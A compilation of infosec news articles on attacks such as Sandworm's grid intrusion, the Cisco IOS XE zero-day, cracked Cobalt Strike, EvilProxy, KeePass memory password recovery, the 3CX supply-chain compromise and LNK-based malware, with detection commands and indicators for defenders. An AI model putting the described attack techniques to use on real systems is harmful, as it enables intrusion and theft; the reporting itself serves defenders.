1. Initial Access

• Example: A phishing email is sent to an employee in the OT/ICS environment. The email contains a seemingly harmless document that, when opened, executes a PowerShell script (a native Windows tool) to create a backdoor.

2. Lateral Movement

• Example: Once inside the network, attackers might use legitimate system administration tools like Windows Management Instrumentation (WMI) or Remote Desktop Protocol (RDP) to move laterally across the network, searching for critical OT/ICS components.

3. Elevation of Privileges

• Example: Attackers might use built-in tools like Netstat to identify security software or firewall settings and then use other native scripts or commands to disable these defenses, or to elevate their access privileges within the system.

4. Discovery and Information Gathering

• Example: Tools like Tasklist or Systeminfo (native to Windows) are used to gather information about the system, such as running processes, installed software, or network configurations relevant to the OT/ICS environment.

5. Exploitation and Manipulation

• Example: In an ICS environment, attackers might use standard industrial communication protocols like Modbus or DNP3 (which are legitimate and essential for normal operations) to send malicious commands to control systems, potentially disrupting physical processes like power generation or water treatment.

6. Persistence and Exfiltration

• Example: Attackers could use standard data transfer tools like FTP or even Windows BITS (Background Intelligent Transfer Service) to exfiltrate stolen data, or to maintain persistence by regularly updating malware or downloading additional tools.

7. Cleanup

• Example: To erase their tracks, attackers might use native cleanup tools or scripts to delete logs or any evidence of their activities, making detection and forensics much more difficult.

In late 2022, a significant cyber-physical incident occurred in Ukraine, attributed to the Russia-linked threat actor Sandworm. This event targeted Ukrainian critical infrastructure and utilized a multi-event cyber attack strategy, incorporating innovative techniques to impact industrial control systems (ICS) and operational technology (OT). The Sandworm actor employed OT-level living-off-the-land (LotL) techniques, likely causing a substation’s circuit breakers to trip and resulting in an unplanned power outage. This outage coincided with mass missile strikes across Ukraine’s critical infrastructure. Additionally, Sandworm executed a second disruptive event by deploying a new variant of CADDYWIPER malware in the victim’s IT environment.

This attack exemplifies the latest advancements in Russia’s cyber-physical attack capabilities, particularly visible since Russia’s invasion of Ukraine. The techniques used indicate a maturing offensive OT arsenal, capable of identifying novel OT threat vectors, developing new capabilities, and leveraging various types of OT infrastructure for attacks. Utilizing LotL techniques likely reduced the time and resources required for the cyber-physical attack. Although the initial intrusion point remains undetermined, the rapid development of the OT component of this attack suggests the actor’s ability to swiftly create similar capabilities against other OT systems globally.

Sandworm, active since at least 2009, is a versatile threat actor conducting espionage, influence, and attack operations, primarily supporting Russia’s Main Intelligence Directorate (GRU). The group’s primary focus has been Ukraine, where it has orchestrated disruptive and destructive attacks using wiper malware, especially during Russia’s re-invasion in 2022. However, Sandworm’s activities extend globally, underlining the Russian military’s extensive ambitions and interests in various regions. The group’s global threat activity and novel OT capabilities necessitate proactive measures from OT asset owners to mitigate potential risks.

As per mandiant research, the 2022 intrusion began or prior to June 2022, culminating in two disruptive events on October 10 and 12. Sandworm accessed the OT environment via a hypervisor hosting a SCADA management instance for a substation, potentially having SCADA system access for up to three months. On October 10, Sandworm used an optical disc (ISO) image, “a.iso,” to execute a native MicroSCADA binary, likely for malicious control commands to switch off substations. The attackers, got into the operational technology (OT) system through a key piece of software (a hypervisor) that managed the control system (SCADA) of a power substation. This means they had access to the system that controls how the power substation works. For up to three months, they could have been inside this system without being detected. On October 10, they used a special file (an ISO image named “a.iso”) to run a command in the control system that was likely intended to turn off power substations.

This case underscores the evolving nature of cyber threats, particularly in critical infrastructure sectors. The increasing sophistication and rapid development of such attacks highlight the need for enhanced cybersecurity measures, continuous monitoring, and preparedness against novel and complex cyber threats in OT and ICS environments.

In OT/ICS environments, such LotL attacks are particularly concerning because they:

• Are harder to detect due to the use of legitimate tools.
• Can cause significant physical and operational damage.
• May bypass traditional security measures that don’t account for malicious use of native tools.

Defending against such attacks requires a combination of robust cybersecurity practices, including employee training, network segmentation, constant monitoring for anomalous behaviors, and regular updating and patching of all systems.

The post How Living-off-the-land (LotL) technique is used to hack into power grids & cause power outages appeared first on Information Security Newspaper | Hacking News.

The Vulnerability: CVE-2023-20198

A new, critical zero-day vulnerability has emerged, labeled as CVE-2023-20198. This vulnerability, with a maximum severity rating of CVSS 10, predominantly affects devices running the Cisco IOS XE software and is currently without a patch, leaving systems vulnerable to potential exploits. The flaw can be exploited by an unauthenticated attacker to create a user account with the highest privilege level, leading to unauthorized system access.

Exploitation in the Wild
Attackers have already begun exploiting this vulnerability in the wild, utilizing it to deliver malicious implants. Organizations using the affected devices are advised to apply mitigation measures promptly to defend against these exploits.

Affected Devices and Systems
The vulnerability, CVE-2023-20198, affects all Cisco IOS XE devices that have the Web UI feature enabled, especially when exposed to the internet or untrusted networks. To ascertain if a system is vulnerable, administrators should:

1. Utilize the command show running-config | include ip http server|secure|active to check for the presence of ip http server or ip http secure-server commands in the global configuration.
2. Inspect the configuration for ip http active-session-modules none or ip http secure-active-session-modules none to determine if the vulnerability is exploitable over HTTP or HTTPS respectively.

Cisco’s Response
Cisco has acknowledged the vulnerability, confirming its presence in devices running the Cisco IOS XE software. The company provided steps to identify affected systems and noted the following Indicators of Compromise (IoCs):

1. System logs containing messages indicating programmatic configuration by unfamiliar users, such as:

• %SYS-5-CONFIG_P: Configured programmatically by process SEP_webui_wsma_http from console as user on line.
• %SEC_LOGIN-5-WEBLOGIN_SUCCESS: Login Success [user: user] [Source: source_IP_address].

1. System logs containing messages about unknown file installation actions, like:

• %WEBUI-6-INSTALL_OPERATION_INFO: User: username, Install Operation: ADD filename.

1. Presence of an implant, checked by issuing the following command from a workstation with access to the affected system:

• curl -k -X POST "https://systemip/webui/logoutconfirm.html?logon_hash=1", if a hexadecimal string is returned, the implant is present.

Cisco, alongside other cybersecurity firms like Tenable, has provided plugins to identify affected systems. While awaiting a patch, these plugins and the aforementioned checks can assist in identifying and mitigating unauthorized access attempts.

CVE-2023-20198 poses a significant threat to cybersecurity due to its maximum severity rating and the absence of a patch. Organizations using affected Cisco IOS XE devices should remain vigilant and apply necessary mitigation measures to safeguard their systems from potential exploits.

The post Cisco’s Ticking Time Bomb: CVE-2023-20198 with CVSS Score 10 Hits Cisco Devices appeared first on Information Security Newspaper | Hacking News.

Cobalt Strike, a legitimate commercial penetration testing tool, has inadvertently become a favored instrument among cybercriminals for its efficacy in infiltrating network security. Initially released in 2012 by Fortra (formerly known as Help Systems), Cobalt Strike was designed to aid red teams in identifying vulnerabilities within organizational infrastructures. Despite stringent customer screening and licensing for lawful use only, malicious actors have successfully obtained and distributed cracked versions of the software, making it a prevalent tool in cyberattacks involving data theft and ransomware.

Cobalt Strike 4.9 is now available. This release sees an overhaul to Cobalt Strike’s post exploitation capabilities to support user defined reflective loaders (UDRLs), the ability to export Beacon without a reflective loader which adds official support for prepend-style UDRLs, support for callbacks in a number of built-in functions, a new in-Beacon data store and more.  

Cobalt Strike 4.9 Features

The latest release, version 4.9, introduces several significant features and improvements:

• User-Defined Reflective Loaders (UDRLs): This feature enhances post-exploitation capabilities by allowing users to define and use their reflective loaders, providing more flexibility and control over the loading process of the Beacon payload.
• Export Beacon Without a Loader: Users can now export the Beacon payload without a reflective loader, which officially supports prepend-style UDRLs, allowing for more versatile deployment and execution of the Beacon payload in various environments.
• Callback Support: Version 4.9 introduces support for callbacks, enabling users to implement and handle custom callback routines effectively.
• Beacon User Data Structures Improvement: These structures have been improved to prevent crashes and provide more stability during operations. They also allow a Reflective Loader to resolve and pass system call information to Beacon, overriding Beacon’s default system call resolver.
• Host Profile Support for HTTP(S) Listeners: This feature addresses limitations in HTTP(S) processing by introducing a new Malleable C2 profile group named http-host-profiles.
• WinHTTP Support: The update adds support for the WinHTTP library to the Beacon’s HTTP(S) listener.
• Beacon Data Store: This feature allows users to store Buffer Overflow Frameworks (BOFs) and .NET assemblies in a structured manner.

Cracked Versions in the Wild

Google researchers have recently identified 34 different cracked versions of the Cobalt Strike hacking toolkit actively being used in the wild. These cracked versions are exploited by cybercriminals for various malicious activities, emphasizing the tool’s popularity and widespread illicit use in the cybercriminal community. The discovery of cracked version 4.9 of Cobalt Strike highlights the significant challenges and risks associated with the illicit use of this powerful toolkit.

The Crackdown

Microsoft, in collaboration with Fortra and the Health Information Sharing and Analysis Center (Health-ISAC), has initiated a widespread legal crackdown on servers hosting these cracked copies. This concerted effort aims to dismantle the malicious infrastructure and disrupt the operations of threat actors utilizing Cobalt Strike for nefarious purposes.

Why Cobalt Strike?

Cobalt Strike has gained notoriety among cybercriminals for its post-exploitation capabilities. Once the beacons are deployed, these provide persistent remote access to compromised devices, allowing for sensitive data harvesting or the dropping of additional malicious payloads.

The Users

Cobalt Strike’s cracked versions are used by unidentified criminal groups, state-backed threat actors, and hacking groups acting on behalf of foreign governments. These actors have been linked to numerous ransomware attacks impacting various industries, causing significant financial and operational damage.

Remediation Efforts

To counteract the malicious use of Cobalt Strike, various entities have provided resources to assist network defenders in identifying Cobalt Strike components within their networks. These resources include open-sourced YARA rules and a collection of indicators of compromise (IOCs).

The illicit use of Cobalt Strike poses a significant threat to global cybersecurity. The ongoing crackdown led by Microsoft, Fortra, and Health-ISAC represents a crucial step towards mitigating the risks associated with Cobalt Strike, underscoring the importance of collaborative efforts in the fight against cybercrime.

The post Unmasking Cracked Cobalt Strike 4.9: The Cybercriminal’s Tool of Choice appeared first on Information Security Newspaper | Hacking News.

According to a study on the events that was published on Wednesday by the cybersecurity company Proofpoint, the attacks demonstrated both the ubiquity of pre-packaged phishing-as-a-service toolkits as well as the increasing bypassing of multi-factor authentication in order to get access to accounts.

It was discovered that EvilProxy was sending 120,000 phishing emails to more than a hundred different companies in an attempt to obtain Microsoft 365 credentials. In the last five months, Proofpoint has seen a concerning increase in the number of successful compromises of cloud account credentials. The vast majority of the attacks were directed against high-ranking officials. According to the researchers’ estimates, the campaign targeted more than one hundred firms throughout the world, which had a total of one and a half million workers.

There were around 39% C-level executives among the victims, 17% of whom were Chief Financial Officers, and 9% of whom were Presidents and CEOs.

At least 35 percent of all users whose accounts were compromised in the previous year had MFA activated, which the researchers discovered to be a substantial rise in the number of account takeovers that occurred among renters who had MFA protection.

Threat actors operating at a very large scale relied heavily on brand impersonation, evasion strategies, and a multi-step infection chain (threat actors redirected traffic through open genuine redirectors).

Researchers from ReSecurity stumbled into the Phishing-as-a-Service (PhaaS) platform known as EvilProxy in September of 2022. The site was offered on the Dark Web. According to some reports, the alternate moniker is Moloch, which may have some link to a phishing-kit that was built by a number of well-known underground players who previously attacked financial institutions and the e-commerce industry.The bundle may be purchased anonymously on the dark web for a sum of four hundred dollars as of the autumn of last year.

As per experts EvilProxy actors circumvent two-factor authentication by using the Reverse Proxy and Cookie Injection techniques. This allows them to proxy the victim’s session. However, now that these approaches have been effectively productized in EvilProxy, it emphasizes the relevance of the development in attacks against online services and MFA authorization systems. In the past, similar tactics have been observed in the targeted campaigns of APT and cyberespionage organizations.

The post How $400 toolkit EvilProxy was used to send 120k phishing emails to hundreds of companies appeared first on Information Security Newspaper | Hacking News.

According to reports, a big data dump that was based on a whistleblower’s breach of internal Tesla papers suggests that problems with Tesla’s autonomous driving system may be considerably more frequent than authorities and the media have suggested. This was discovered after the whistleblower gained unauthorized access to internal Tesla documents.

According to information that was taken from Tesla’s information technology (IT) system, complaints against these Full Self Driving (FSD) capabilities originated from all over the globe, including the United States of America, Europe, and Asia.

Particularly, in an article titled “My autopilot almost killed me,” Handelsblatt reported receiving 100 terabytes of data and 23,000 files. Within those files were 3,000 entries highlighting consumers’ safety concerns and tales of more than 1,000 crashes.

The publisher included a note stating that the data includes the phone numbers of customers.

According to the hundreds of clients that Handelsblatt is claimed to have contacted, the fears were quite serious.

According to one man from Michigan, his Tesla “suddenly braked hard, as hard as you can imagine.” When I was ordered to fasten my seatbelt, the vehicle was on the verge of coming to a complete halt. I was then struck by a second car.

The files were shown to the Fraunhofer Institute for Secure Information Technology by Handelsblatt. The institute concluded that there is no reason to presume that “the data set does not come from IT systems belonging to or in the environment of Tesla.”

Employees are instructed that, unless lawyers are involved, they should not deliver written comments but rather should convey them “VERBALLY to the customer.” Unless attorneys are involved, written critiques should not be given.

The post quotes the instructions as saying, “Do not copy and paste the report below into an email, text message, or leave it in a voicemail to the customer,” and it is clear that this is a requirement.

An report featured a doctor from California who said that her Tesla accelerated on its own in the autumn of 2021 and smashed into two concrete pillars. She noted that the company never sent emails and that everything was always communicated verbally.

According to the attorneys for Tesla, the news organization is required to provide a copy of the data to Tesla, and all other copies of the data must be destroyed. The attorneys for Tesla also warned legal action “for the theft of confidential and personal data.”

According to reports, the alleged papers would undoubtedly be important to current wrongful death lawsuits made against Tesla. These claims assert that the company’s technology has significant safety faults. Additionally, they may compel local, state, and federal authorities to take action.

The state’s data protection officer, Dagmar Hartge, recognized the seriousness of the allegations and pointed out that, should the allegations prove to be accurate, the data breach would have significant repercussions on a worldwide scale. The situation has been sent to privacy advocates in the Netherlands so that additional investigation might be conducted.

“Tesla takes the protection of its proprietary and confidential information, as well as the privacy of its employees and customers, very seriously.” “We intend to initiate legal proceedings against this individual for his theft of Tesla’s confidential information and employees’ personal data,” Tesla stated in a response that was reported by the publication. The statement was made in reaction to the theft of sensitive information and personal data pertaining to Tesla employees.

The Chinese regulatory authorities have already started to take action. Approximately two weeks ago, Tesla was forced to provide an emergency software update for the majority of the automobiles it has sold in China as a direct result of problems with unexpected and sudden acceleration.

Since 2016, Musk has made many claims that his self-driving vehicles would be really autonomous, but he has not delivered on those claims.

The post Want to own a tesla or already own one, check this massive confidential data breach of Tesla appeared first on Information Security Newspaper | Hacking News.

This security flaw, which has been given the identifier CVE-2023-32784, makes it possible for the user’s master password to be dumped from memory even when the user’s workspace is closed or the program is no longer active. The master password is the main key that may be used to unlock the user’s database of passwords. A hostile actor could be able to extract the plain text master password from a memory dump. KeePass 2.x versions previous to 2.54 include this vulnerability. This vulnerability is widespread in KeePass 2.x versions. It’s possible that this is a dump of the KeePass process, but it might also be a swap file, a hibernation file, or even a RAM dump of the whole system. The fact that the initial character of the password cannot be reconstructed is the only minor solace in this situation.

A researcher by the name of vdohney built a proof-of-concept tool and gave it the suitable moniker “KeePass Master Password Dumper” in order to draw attention to this issue. This program provides a clear demonstration of how the master password might be retrieved from KeePass’s memory with the exception of the first character. This can be done without needing code to be executed on the machine that is being targeted, and it can be done even if the workspace is locked or if KeePass is no longer operating.

When entering passwords, KeePass 2.X makes use of a text box that was built specifically for it called SecureTextBoxEx. This text box is utilized not just for the insertion of the master password, but also in other locations in KeePass, such as password edit boxes (which means that the attack may also be used to retrieve the contents of other password edit boxes).

The vulnerability that is being exploited here is the fact that a leftover string is formed in memory for each character that is entered. Because of the way that.NET operates, once an instance of it has been created, it is very difficult to delete it. For instance, when the word “Password” is entered, it will leave behind the following strings: •a, ••s, •••s, ••••w, •••••o, ••••••r, •••••••d. The proof-of-concept program looks through the dump to find these patterns and suggests a possible character to use for each location in the password.

The reliability of this attack is susceptible to change based on the manner in which the password was written as well as the number of passwords that were input within a single session. However, it appears that the way.NET CLR creates these strings implies that they are likely to be well ordered in memory. This is true even if there are numerous passwords used for a single session or if there are errors in the passwords. Therefore, if three distinct passwords were entered, you have a good chance of getting three options for each character place in that sequence. This enables you to recover all three passwords if they were entered.

Should You Be Concerned About This?
It is dependent on the threat model you choose. This discovery does not significantly worsen your condition if your machine is already infected with malware that is operating in the background with the rights of your user. On the other hand, in contrast to KeeTheft and KeeFarce, there is no need for any kind of process injection or other code execution for the malware to be stealthy and dodge the antivirus software. This may make it simpler for the malware.

It might be a problem if you have a reasonable suspicion that someone could get access to your computer and undertake forensic examination. Even if KeePass is completely shut down or secured, it is still possible for the master password to be rediscovered. This is the worst-case situation.

If you have a clean machine and utilize full disk encryption with a strong password, you should be OK. Because to this discovery, it will be impossible for anybody to steal your credentials remotely over the internet.

The post Hack KeePass – Extract KeePass master password from Memory using this tool appeared first on Information Security Newspaper | Hacking News.

It is believed that the attack is a multi-part process, with the first stage using a hacked version of the 3CX desktop application. Although the.exe file and the MSI package have the same name, preliminary research indicates that the MSI package is the one that may include DLLs that have been maliciously modified.

The beginning of the infection process occurs when 3CXDesktopApp.exe loads the ffmpeg.dll file. After that, ffmpeg.dll will read the encrypted code from d3dcompiler_47.dll and then decode it. It seems that the decrypted code is the backdoor payload that attempts to visit the IconStorage GiHub page in order to access an ICO file that contains the encrypted C&C server that the backdoor connects to in order to acquire the probable ultimate payload.

It is not a coincidence that the threat actors responsible for this attack chose these two DLLs (ffmpeg and d3dcompiler_47) as targets for their attack. The application in issue, known as 3CXDesktopApp, was developed using the open-source framework Electron. Both of the libraries in issue are often distributed along with the Electron runtime. As a result, it is very unlikely that they would arouse suspicion inside the surroundings of individual customers. In addition, the file that was tampered with, d3dcompiler 47, is signed with a certificate that was granted to Microsoft Corporation, and the digital signature details for Windows reflect that there are no problems associated to the signature. A signed binary that makes use of a valid certificate procured from a trustworthy company such as Microsoft is more likely to be given the “green light” when it comes to endpoint protection programs.

In this instance, the “smoking gun” was a combination of RC4 encrypted shellcode that was inserted into the signature appendix of d3dcompiler and a reference to the d3dcompiler library that was introduced to the ffmpeg library. Both of these things were added to the ffmpeg library.

Windows will show a notification saying the “digital signature of the item did not validate” whenever a signed executable is updated, but despite the fact that we are aware that the d3dcompiler_47.dll DLL was altered, Windows continued to present it as signed. This is despite the fact that we are aware of the fact that it was modified.

It seems the DLL is abusing the CVE-2013-3900 flaw, which is referred to as a “WinVerifyTrust Signature Validation Vulnerability.”

On December 10, 2013, Microsoft was the first company to publicly disclose this vulnerability. At the time, the company explained that it is possible to add content to the authenticode signature section of an EXE (the WIN CERTIFICATE structure) in a signed executable without rendering the signature invalid.

Microsoft made the final decision to make the fix optional, most likely because it would invalidate genuine, signed executables that contained data in the signature block of an executable. As a result, Microsoft made the decision to make the update optional.

According to the disclosure made by Microsoft for the CVE-2013-3900, the company changed the way signatures are verified for binaries signed with the Windows Authenticode signature format with the release of an update on December 10, 2013. This update was made available for all supported releases of Microsoft Windows.

This modification may be activated on a voluntary basis if desired.When the new behavior for Windows Authenticode signature verification is enabled, Windows will no longer regard non-compliant binaries as signed, and it will no longer allow unnecessary information to be stored in the WIN CERTIFICATE structure.

Even though it has been close to 10 years after the vulnerability was discovered, and even though it is known that several threat actors are exploiting it, the remedy is still an opt-in feature that can only be activated by manually modifying the Windows Registry. To make things worse, even if you add the Registry entries to apply the update, they will be deleted after you upgrade to Windows 11, putting your device susceptible once again.

Companies that are possibly impacted should immediately cease using the vulnerable version of the software, dlls if at all feasible and implement any patches or mitigating measures, if these are available. IT and security personnel should also search for proven compromised binaries and builds and watch for abnormal activity in 3CX processes, with a particular attention on C&C traffic.

In the meanwhile, activating behavioral monitoring in security solutions may assist in determining whether or not an attack is currently taking place inside the system.

The post d3dcompiler_47.dll: If AV raises an alerts about this Microsoft signed dll file, you are in trouble appeared first on Information Security Newspaper | Hacking News.

According to the firm, “the attacker searched the Digital Ocean cloud hosting IP address space and discovered operating CAS services on ports 7741, including the General Bytes Cloud service and other GB ATM operators running their servers on Digital Ocean.”

The attackers gained access to the database as well as API keys for accessing money in hot wallets and exchanges as a result of the code execution. The attacker leveraged the master service interface to remotely upload a Java program, gaining access to BATM user rights, the database, and API keys required to access money in hot wallets and exchanges.

As a consequence, the hacker gained access to users, password hashes, turned off two-factor verification, and sent funds from hot wallets.

The hacker was successful in stealing 56.28 bitcoin, worth around $1.5 million, as well as liquidating other cryptocurrencies including as ETH, USDT, BUSD, ADA, DAI, DOGE, SHIB, and TRX. The stolen assets have not been moved from the bitcoin address since March 18, and certain digital currencies have been transferred to other destinations, including a decentralized trading platform.

Additionally, the attackers got the “ability to access terminal event logs and search for each occurrence when users scanned private key at the ATM,” information that previous versions of ATM software recorded.

“On March 18, we advise all of our clients to take quick steps to safeguard their finances and personal information,” General Bytes tweeted.

The wallet addresses and three IP addresses used by the attacker in the breach have been revealed by the firm. Yet, according to certain sources, the company’s complete node is safe enough to prevent unwanted access to cash.

The business released information on the actions clients should take to safeguard their GB ATM servers (CAS) in a security advisory documenting the event, emphasizing that even those who were not affected by the incident should adopt the suggested security measures.

“Please keep your CAS protected by a firewall and a VPN.” Terminals should also use VPN to connect to CAS. With a VPN/Firewall, attackers from the open internet are unable to access and exploit your server. If your server was compromised, please reinstall the whole server, including the operating system,” the business advises.

The crypto ATM manufacturer issued a CAS security patch and advised consumers to consider all user passwords and API keys to exchanges and hot wallets as compromised and to replace them. 
“We don’t have the final statistics yet,” General Bytes said. We’re currently gathering information from operators. We are still dealing with damage of roughly 56 BTC as of today.

The post How Cryptocurrency ATM manufacturer was hacked and millions of funds were stolen? appeared first on Information Security Newspaper | Hacking News.

According to the indictment, Pankov was responsible for creating a piece of malicious software known as “NLBrute.” Deciphering login credentials like passwords was one of the powerful malware’s capabilities, which allowed it to compromise otherwise secure machines. Pankov was able to get the login credentials for tens of thousands of machines located in different parts of the globe by making use of NLBrute. He advertised NLBrute to other online criminals, sold it to them himself, and paid other people to sell it on his behalf. On a website on the dark web that specialized in the acquisition and selling of access to infected systems, Pankov sold the stolen login credentials that he had obtained.

After being sold, those credentials were then used to assist a broad variety of illicit behavior, including fraud involving taxes and ransomware attacks. Pankov gained more than $350,000 in illegal gains from the website by selling the login credentials of more than 35,000 infected machines, which he offered for sale on the website.

The post US extradites Russian hacker accused of creating password-cracking software appeared first on Information Security Newspaper | Hacking News.

Threat actors take advantage of the frequent feature updates that Microsoft makes to OneNote in order to install malware on users’ computers by tricking them into double-clicking on spam emails. This causes the user’s computer to automatically run a script that downloads malware from remote locations. A user’s device may be infected with malware, which can then be used not just to steal passwords but also to attack cryptocurrency wallets or even to install other software on the device without the user’s knowledge.

In the beginning, Microsoft eliminated the capability of its Office documents to make use of macros, which prevented malicious actors from using Excel and Word files to distribute malware. In addition, users are unable to open ZIP and ISO files without first going through a series of security warnings since Microsoft has restricted this functionality. Hackers have discovered methods to get around the ban on macros, which allows them to spread malware. Phishing emails may include a variety of bogus attachments, including fraudulent invoices, delivery confirmations, or alerts, amongst other things.

The majority of the time, the photographs in the email will be obscured, and the subject line will read, “Double Click to View File.” However, doing so actually launches a malicious Visual Basic script file, which begins contacts with a remote server to install malware, which may include a range of trojans. The file is designed to exploit vulnerabilities in Microsoft’s Visual Basic programming language.

Microsoft has already put a stop to the mining of cryptocurrencies on its network, since this activity is often associated with unlawful user access. Because of this, there has been a dramatic reduction in the deterioration and interruption of cloud services.

However, in order for users of OneNote to fully safeguard themselves, it is essential for them not to dismiss warnings that are shown by the program and to make use of multi-factor authentication, antivirus software, and firewalls whenever it is practicable to do so. In addition to this, it is essential that they refrain from downloading attachments from email URLs with which they are unfamiliar.

The post New kind of phishing attacks are exploiting Microsoft OneNote to bypass disabled macro appeared first on Information Security Newspaper | Hacking News.

Worse still, the business discovered evidence that the attacker stole an encryption key for a portion of the encrypted backups. This makes the situation much more dire. The only logical conclusion to draw from this is that decrypting this backup files would disclose private customer information.

According to GoTo, the data that might have been compromised include usernames associated with accounts, passwords that have been salted and hashed, some Multi-Factor Authentication (MFA) settings, as well as certain application settings and licensing information.

Both GoTo Rescue and GoToMyPC provide customers with the ability to access a computer remotely through the internet. The malicious hacker was successful in obtaining the MFA settings for a portion of those users.

The problem started when a malicious actor obtained access to a cloud storage provider that both LastPass and GoTo make use of. GoTo was the company that was hacked first.

Because the security breach at LastPass was so serious, the company was forced to hand over to the hacker not just customers’ data encryption vaults but also a vast quantity of additional exposed personal information pertaining to users.

The data stored in LastPass vaults is encrypted; nonetheless, if a hacker were to gain the vault master passwords, it is possible that the data might be decoded. There are two ways that you may achieve this objective: either by human guessing or through the use of automated tools.

GoTo has not yet announced the potentially large size of the user base that would be affected by this issue. Nevertheless, according to the business’s statement from the previous year, they had 800 000 customers. Products like Goto Central and Pro are designed to provide IT staff the ability to oversee their operations from a remote location. Hamachi is a hosted virtual private network (VPN) service, while Join.me is an online meeting facilitator.

As a result of the incident, customer accounts that utilize GoTo products can be more susceptible to being attacked. It should come as no surprise that those who depend on GoTo’s remote access software would find this to be quite upsetting news. As a result of this, the business has provided affected users with new passwords and introduced multi-factor authentication (MFA).

The company makes direct human contact with customers who have expressed concern in order to provide further information, as well as to suggest potential solutions to the problems.

According to the company’s statement, “In addition, we are migrating their accounts onto an enhanced Identity Management Platform,” which will provide additional security with more robust authentication and login-based security options. “In addition, we are migrating their accounts onto an enhanced Identity Management Platform,”

Due to the fact that GoTo does not collect data such as dates of birth, home addresses, or Social Security numbers, the company has said that the data breach did not result in the loss or theft of any sensitive information. Despite this, it is possible that consumers would lose trust in the company as a result of the hacking event.

The post Central Pro, Join.me, Hamachi, and RemotelyAnywhere services encrypted backups and keys hacked appeared first on Information Security Newspaper | Hacking News.

Specifically, the technology company points out that there has been a wave of cyberattacks whose protagonists are families of ‘malware’ such as QakBot, IceID, Emotet and RedLine Stealer, using files with the nomenclature ‘.lnk’.

LNKs are Windows shortcut files that can contain malicious code and are used to abuse legitimate system tools, such as running Microsoft HTML application files. According to HP, shortcuts are replacing Office macros as they require too much user intervention and risk alerts to overcome. In this way, shortcuts are a trap through which attackers trick their victims into infecting their PCs. This access to company systems can be used to steal relevant company information or sell it to ‘ransomware’ groups. ‘, which can lead to large-scale data breaches.

It is not surprising then that, after carrying out an analysis, HP has verified an 11 percent increase in compressed files containing ‘malware’, among which those of the LNK type stand out. Specifically, it is common for attackers to place shortcut files in ZIP attachments, in order to evade email security scanners in business environments.

Additionally, the research team has detected LNK malware available for purchase on hacker forums, making it easier for cybercriminals to opt for this technique of executing malicious code. Separately, HP has exposed another case where attackers took advantage of the flaw created by the zero-day vulnerability in the Microsoft Support Diagnostic Tool (MSDT), also called ‘Follina’, to distribute OakBot, Agent Tesla and the Remcos RAT remote access Trojan before a patch was available.

Likewise, a new execution technique has been identified that spreads the SVCReady malware in the shellcode hidden in documents. This campaign stands out precisely because of the unusual way in which it is distributed to PCs.   

HP has highlighted other conclusions reached in this analysis and has pointed out that threat actors used a greater number of malware families in their attempts to infect organizations (593 compared to 545 in the previous quarter).

Likewise, the technology company has put the focus on new malicious file formats used to evade detection, since its collected data indicates that 14 percent of email malware evaded at least one gateway scanner by email.

HP has also highlighted that 69 percent of detected malware was sent via email, while web downloads were responsible for 17 percent of cyberattacks. Likewise, it has been pointed out that the most common ‘phishing’ scams were transactions such as ‘Order’, ‘Payment’, ‘Purchase’, ‘Request’ and ‘Invoice’.

The post LNK files is one of the most common way of hacking into enterprise environment appeared first on Information Security Newspaper | Hacking News.